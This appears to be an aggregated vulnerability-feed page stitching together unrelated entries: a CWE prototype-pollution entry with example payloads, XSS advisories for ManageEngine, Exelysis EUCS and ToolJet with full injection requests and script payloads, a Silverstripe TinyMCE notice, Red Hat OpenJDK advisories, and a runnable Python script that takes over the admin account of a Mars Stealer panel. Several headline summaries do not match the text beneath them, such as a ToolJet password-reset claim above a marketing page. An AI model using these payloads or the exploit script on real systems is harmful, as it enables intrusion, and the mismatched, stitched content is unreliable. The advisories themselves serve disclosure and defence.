vConsole v3.15.0 was discovered to contain a prototype pollution due to incorrect key and value resolution in setOptions in core.ts.

Weakness ID: 1321

Abstraction: Variant  
Structure: Simple

 Description

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

 Extended Description

By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the product depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf).

This weakness is usually exploited by using a special attribute of objects called proto, constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively.

 Relationships

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

 Relevant to the view "Research Concepts" (CWE-1000)

Nature

Type

ID

Name

ChildOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

915

Improperly Controlled Modification of Dynamically-Determined Object Attributes

CanPrecede

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

471

Modification of Assumed-Immutable Data (MAID)

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

 Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (CWE-1003)

Nature

Type

ID

Name

ChildOf

Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

913

Improper Control of Dynamically-Managed Code Resources

 Modes Of Introduction

The different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.

Phase

Note

Architecture and Design

Implementation

 Applicable Platforms

This listing shows possible areas for which the given weakness could appear. These may be for specific named Languages, Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms. The platform is listed along with how frequently the given weakness appears for that instance.

Languages

JavaScript (Undetermined Prevalence)

 Common Consequences

This table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Scope

Impact

Likelihood

Integrity  

Technical Impact: _Modify Application Data_

An attacker can inject attributes that are used in other components.

High

Availability  

Technical Impact: _DoS: Crash, Exit, or Restart_

An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash.

High

 Demonstrative Examples

Example 1

This function sets object attributes based on a dot-separated path.

(bad code)

Example Language: JavaScript 

function setValueByPath (object, path, value) {

const pathArray = path.split(".");  
const attributeToSet = pathArray.pop();  
let objectToModify = object;  
for (const attr of pathArray) {

if (typeof objectToModify\[attr\] !== 'object') {

objectToModify\[attr\] = {};  
}

objectToModify = objectToModify\[attr\];  
}

objectToModify\[attributeToSet\] = value;  
return object;  
}  

This function does not check if the attribute resolves to the object prototype. These codes can be used to add "isAdmin: true" to the object prototype.

(bad code)

Example Language: JavaScript 

setValueByPath({}, "\_\_proto\_\_.isAdmin", true)  
setValueByPath({}, "constructor.prototype.isAdmin", true)  

By using a denylist of dangerous attributes, this weakness can be eliminated.

(good code)

Example Language: JavaScript 

function setValueByPath (object, path, value) {

const pathArray = path.split(".");  
const attributeToSet = pathArray.pop();  
let objectToModify = object;  
for (const attr of pathArray) {

_// Ignore attributes which resolve to object prototype_  
if (attr === "\_\_proto\_\_" || attr === "constructor" || attr === "prototype") {

continue;  
}  

if (typeof objectToModify\[attr\] !== "object") {

objectToModify\[attr\] = {};  
}  

objectToModify = objectToModify\[attr\];  
}  

objectToModify\[attributeToSet\] = value;  
return object;  
}  

 Observed Examples

Reference

Description

CVE-2018-3721

Prototype pollution by merging objects.

CVE-2019-10744

Prototype pollution by setting default values to object attributes recursively.

CVE-2019-11358

Prototype pollution by merging objects recursively.

CVE-2020-8203

Prototype pollution by setting object attributes based on dot-separated path.

 Potential Mitigations

Phase: Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Effectiveness: High

**Note:** While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software ("libraries").

Phase: Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Effectiveness: High

Phase: Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Effectiveness: Limited

Phase: Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Effectiveness: High

Phase: Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

Effectiveness: Moderate

 References

 Content History

More information is available — Please select a different filter.

CVE-2023-30363: CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (4.10)

Zoho ManageEngine Applications Manager through 16390 allows DOM XSS.

**DOM-Based XSS Vulnerability**  

Vulnerability Details

Severity

**High**

CVE ID

CVE-2023-29442

Affected software versions

Version 16390 and below

Fixed Version

Version 16362 to 16369  
Version 16400 and above

Fixed On

06 March 2023

**Details**

DOM-Based XSS Vulnerability while accessing the proxy.html file allows attacker to craft an url with malicious JavaScript payload. When clicking the crafted url, that is shared by an attacker, malicious JavaScript gets executed in the victim browser.

**Impact**

This vulnerability executes JavaScript in the victim's browser controlled by the attacker to carry out any of the actions that are applicable to the administrator users of Applications Manager.

**Fix**

Applications Manager version 16400 and above fixes this issue by removing the proxy.html file from the product since it is not required anymore.

**Steps to update**

Update your Applications Manager instance to the latest build using the service pack.

**Source and Acknowledgements**

Find out more about CVE-2023-29442 from CVE Directory and NIST NVD.

**Reported by:**

Rahul, ProjectDiscovery Security Research Team.

**Need Help?**

For clarification or corrections please contact our support team or email us at appmanager-support@manageengine.com

CVE-2023-29442: Security Updates - CVE Details - CVE-2023-29442

Cross Site Scripting vulnerability found in Exelysis Unified Communication Solutions (EUCS) v.1.0 allows a remote attacker to execute arbitrary code via the Username parameter of the eucsAdmin login form.

Permalink

Cannot retrieve contributors at this time

Reflected XSS (Cross-Site Scripting) attacks

Type: Unauthenticated Remote attacks

We have identified that the “eucsAdmin login” web page of “Exelysis Unified Communication Solution (EUCS)” product is vulnerable to "Reflective" Cross-site scripting (XSS) at two injection points. This is due to that the Web App fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.

Reflected XSS in URL Path

\-------------------------

Request:

GET /login.php/%22%3E%3Cscript%3Ealert(%22IthacaLabs%22)%3C/script%3E%22%3Cform%20name=%22form%22%20action=%22/login.php HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: redirect=1; testing=1; PHPSESSID=something

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Affected Code:

<form name="form" action="/login.php/"><script>alert("IthacaLabs")</script>"<form name="form" action="/login.php" method="post" target="\_self" class="form-horizontal" style="margin-bottom: 0px !important;">

Reflected XSS in Username Parameter

\-----------------------------------

Request:

POST /\_/login.php HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 90

Origin: https://1.1.1.1

Connection: close

Referer: https://1.1.1.1/\_/login.php

Cookie: redirect=1; testing=1; PHPSESSID=something

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

username=test"><script>alert("XSSbyIthacaLabs");</script><input id="username&password=test

Affected Code:

<input id="username" name="username" type="text" class="form-control" placeholder="Username" value="test"><script>alert("XSSbyIthacaLabs");</script><input id="username">

CVE-2023-29836: Exelysis/EUCS Admin Login XSS.txt at main · IthacaLabs/Exelysis

Tooljet v1.6 does not properly handle missing values in the API, allowing attackers to arbitrarily reset passwords via a crafted HTTP request.

We've raised $4.6m in funding 🚀

**Everything you  
need  
to build internal tools****Everything you need  
to build internal tools**

Open-source low-code application development platform for  
building and deploying business applications.

Trusted by large development teams worldwide.

**Building Blocks For  
Beautiful Interfaces**

Build complicated frontends without any experience in React,  
CSS or event HTML. Drag and drop 35+ in-built UI components  
to build even complicated frontends.

35+ UI components

Adding new components, resizing them, adjusting position, changing colors etc can be done using the visual app editor.

Drag and drop

Customize the component with in-built properties and styles without using a single line of code.

State inspector

Viewer for verifying current properties of components, queries and global states of applications.

Multi pages apps

Every app can have multiple pages that can be linked with each other.

We were looking for a low-code platform to migrate our team processes previously based on worksheets. By using Tooljet, we have been able to shorten significantly the design and development time of our tools and enrich their functionality. Moreover, the Tooljet team has always been reactive and keen to address our requests on the fly.

**Francois Xavier Lecarpentier**

Head of Research production management

**ToolJet Database**

ToolJet ships with an in-built no-code database built on top of  
PostgreSQL.

See this in action

The ability to create custom internal tools is a game-changer for us. ToolJet is our organization's key to enabling efficient internal operations and building to scale and transforming from start-up to established enterprise.“

**Meg McCafferty**

Head of Internal Systems

**Connect to 40+  
of your favourite tools**

In-built connectors for databases, RESTful/GraphQL  
endpoints, cloud storage services and SaaS apps. Use JavaScript or Python code to join and transform data.

Explore all connectors

ToolJet has really helped us build Byju’s Tuition Center and scale it in a very quick time. The easy customisation and crisp UI has made it very friendly for operations team.

**Siddhartha Chakraborti**

Associate Director Product

**Build With Your Team**

**Multiplayer Editing**

A dozen team members working on same app? no problem! changes from everyone is synced in realtime.

**Comment on Canvas**

Collaborate with all the stakeholders within the app builder using the comment feature.

We’ve been using Untitled to kick start every new project and can’t imagine working without it.We’ve been using Untitled to kick start every new project and can’t imagine working without “

**Candice Wu**

Product Manager,

**Enterprise ready**

SSO

Integrate with Okta, AzureAD, Google  
or OIDC for a seamless authentication

Audit Logging

Every action of users are logged  
and is searchable via dashboard.

Permissions & Access Control

Restrict the access to applications based on user groups.

Air-gapped deployment

On-premise installations of ToolJet does not require internet to function.

Multi-environment

Every application can have environments like staging, production, etc.

Priority Support

Phone, Slack and email support channels for quick response from our engineers.

We stumbled upon ToolJet which promised to build the tools that we need without writing a single line of code. Honestly we thought it was impossible, nevertheless gave it a try. Couple of few weeks later we had beautiful custom built dashboards embedded into the admin areas of our products with meaningful data points aggregated from multiple data sources.

**Unnikrishnan KP**

Head of Engineering

**Flexible and extensible**

Connect to databases, data lakes, SaaS tools, cloud storages,API endpoints and GraphQL endpoints to fetch data and take actions. ToolJet does not store

Open source

Write custom JS and Python code

Import  your own React components

Plugins

We’ve been using Untitled to kick start every new project and can’t imagine working without it.We’ve been using Untitled to kick start every new project and can’t imagine working without “

**Candice Wu**

Product Manager,

**Build apps that fits for any businesses**

**Join our Open- Source community**

Join our Slack community of 1300+ members and GitHub community of 300+ contributors!

CVE-2022-27978: Tooljet | Open-source low-code platform to build internal tools

A cross-site scripting (XSS) vulnerability in ToolJet v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment Body component.

**Advisory**

**Software**: ToolJet  
**Vendor**: ToolJet Solutions Inc.  
**Affected Versions**: < 1.11.0  
**CVE**: CVE-2022-27979  
**CWE IDs**: 79  
**Reporter**: Chris Grieger

**Description**

https://github.com/ToolJet/ToolJet

    ToolJet is an open-source low-code framework to build and deploy internal tools quickly without much effort from the engineering teams. You can connect to your data sources, such as databases (like PostgreSQL, MongoDB, Elasticsearch, etc), API endpoints (ToolJet supports importing OpenAPI spec & OAuth2 authorization), and external services (like Stripe, Slack, Google Sheets, Airtable) and use our pre-built UI widgets to build internal tools.
    

Through improper sanitization of user input the the application an authenticated attacker to perform a stored Cross-site Scripting (XSS) attack on other users through the Comment component of the ToolJet Job Editor.

**POC**

Authenticated users can add a comment to a ToolJet app. When a users activates the comments 'submenu' the malicous javascript payload will be executed.

Following is an example that demonstrates the vulnerability.

<img style\="visibility:hidden" onerror\="console.log\`xss\`" src\="\_\_"\>

**Mitigation**

Update ToolJet to a version >= 1.11.0.

**Timeline**

Date

Action

2022/03/21

Contacted developers with security finding, POC and mitigation note.

2022/04/22

Fix version released.

CVE-2022-27979: security-advisories/20220321-tooljet-xss.md at main · fourcube/security-advisories

An old version of TinyMCE include an XSS vulnerability, which was patched in a later version. This was described by TinyMCE:

> A cross-site scripting (XSS) vulnerability was discovered in the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.10 or lower and TinyMCE 5.4.0 or lower.

We reviewed the potential impact of this vulnerability within the context of Silverstripe CMS. We concluded this is a medium impact vulnerability given how TinyMCE is used by Silverstripe CMS.

Reported by: Developers at ACC

**Package**

composer silverstripe/admin (Composer)

**Affected versions**

< 1.12.7

**Patched versions**

1.12.7

**Description**

An old version of TinyMCE include an XSS vulnerability, which was patched in a later version. This was described by TinyMCE:

> A cross-site scripting (XSS) vulnerability was discovered in the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.10 or lower and TinyMCE 5.4.0 or lower.

We reviewed the potential impact of this vulnerability within the context of Silverstripe CMS. We concluded this is a medium impact vulnerability given how TinyMCE is used by Silverstripe CMS.

Reported by: Developers at ACC

**References**

*   GHSA-wqm8-jx8r-8rcq
*   GHSA-vrv8-v4w8-f95h
*   https://www.silverstripe.org/download/security-releases/ss-2023-001
*   https://www.tiny.cloud/docs/release-notes/release-notes54/#securityfixes

 GuySartorelli published to silverstripe/silverstripe-admin

Apr 26, 2023

Published to the GitHub Advisory Database

Apr 26, 2023

Reviewed

Apr 26, 2023

Last updated

Apr 26, 2023

GHSA-wqm8-jx8r-8rcq: Cross-site scripting vulnerabilities in old version of bundled TinyMCE

Red Hat Security Advisory 2023-1884-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenJDK 17.0.7 Security Update for Portable Linux Builds  
Advisory ID:       RHSA-2023:1884-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1884  
Issue date:        2023-04-19  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and  
the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.7) for portable Linux  
serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.6) and  
includes security and bug fixes, and enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

5. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEguotzjgjWX9erEAQjWaw//f/1fGZLdxS+l3gHG3PYKIYAIatYKQLxX  
PkjB56ZS3en4X+2Sj12m1ePTVKZOOVX4G5EE+CxJXhn1SwvkCZFclWMAEVvQaSda  
bI5rGGIv32mk44X7KmwsyOQyg5HsyRF34JHudNiBNDfWtXnaev4hoYU3m64Z1M3p  
TWn+2OqMXCEYYmoMzwdH7NTTk80jd9dP6NvwSoUhHHLs/z6YvtB9GP1/349tutIW  
AOVemoO06mezefFtGnua79n0F7RJNPrhFa5QtiRmuCjYk9f1AepwF3YEU+3aXd1h  
m1Xul/4Kfy5koYvHSRpabO+aBtz/3yFKEVE8aZTRi+t536RLRfEnbWFIBcLNCi17  
J2Y0uTOR+H+eiwJnBL8g2QKl/7cGpqFXziUSuiytk0hoTmIKKoC0T4bmZU2pb3nv  
YMRMRb9iHoL1D+dUZjLDpV2O/jW9EdBn+UTdcMEvdRiTSOXzePiZfTpmwdrcI0GC  
i+SJnw7+MT9ExoyDaJhpgwS2BsTPpW86mhi2SgsnOOSUh8jAyJmQxVZhJehFzpa6  
Wz3cUK2bGJWeeP66RS9Ud+MdQcDdZVFFXKHt4/3WCX4YP7TrhqE71l0ZrYh+znr/  
0il5mhtN64F9WRTSQeFad6HKosNN5iUDZCJTwnvStf9R5+PzJEYXBX9xzcW8zyon  
ReUtQp2BJw8=  
=vr4N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1884-01

Mars Stealer version 8.3 suffers from an account takeover vulnerability.

    # Exploit Title: Mars Stealer 8.3 - Admin Account Takeover# Product: Mars Stelaer# Technology: PHP# Version: < 8.3# Google Dork: N/A# Date: 20.04.2023# Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_limport argparseimport requestsparser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')args = parser.parse_args()url = args.url.rstrip('/') + '/includes/settingsactions.php'headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}data = {"func": "savepwd", "pwd": "sköll"} #change passwordresponse = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Succesfull!")    print("New Password: " + data["pwd"])else:  print("Exploit Failed!")

Mars Stealer 8.3 Account Takeover

Red Hat Security Advisory 2023-1911-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2023:1911-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1911  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.el8_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.el8_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el8_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el8_1.x86_64.rpm

